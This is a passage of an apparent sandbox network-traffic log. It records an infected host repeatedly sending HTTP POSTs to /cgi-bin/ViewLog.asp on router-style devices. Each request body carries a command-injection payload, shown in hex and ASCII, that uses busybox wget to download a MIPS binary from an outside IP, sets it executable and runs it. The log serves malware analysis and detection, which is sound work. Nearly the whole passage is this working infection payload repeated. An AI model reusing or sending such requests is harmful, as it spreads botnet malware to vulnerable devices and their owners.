                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.209579945 CET90INHTTP/1.1 403 Forbidden


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              69192.168.2.135729285.14.237.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:20.978307009 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.182187080 CET545INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 345
                                              Date: Thu, 23 Nov 2023 04:15:20 GMT
                                              Server: lighttpd/1.4.45
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              70192.168.2.133961094.120.111.638080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.005628109 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              71192.168.2.135401094.253.19.288080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.015638113 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              72192.168.2.135819094.120.169.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.234807968 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              73192.168.2.135740494.120.32.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.242244005 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              74192.168.2.133614095.86.64.398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:21.253258944 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              75192.168.2.134245894.120.236.378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.014878988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              76192.168.2.135892662.29.75.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.028067112 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              77192.168.2.134299895.164.242.2188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.611053944 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:23.714442015 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/3.5.27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:15:23 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3556
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from ubuntu
                                              X-Cache-Lookup: NONE from ubuntu:8080
                                              Via: 1.1 ubuntu (squid/3.5.27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2017 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              78192.168.2.133434431.136.132.118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.677712917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:26.758701086 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:32.902626038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:44.934693098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:09.254538059 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:58.406415939 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              79192.168.2.133849894.122.62.1148080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.714015007 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              80192.168.2.134802662.29.87.2048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.719598055 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              81192.168.2.134385631.44.135.1738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:23.731738091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              82192.168.2.134375031.136.104.1438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:24.048238039 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
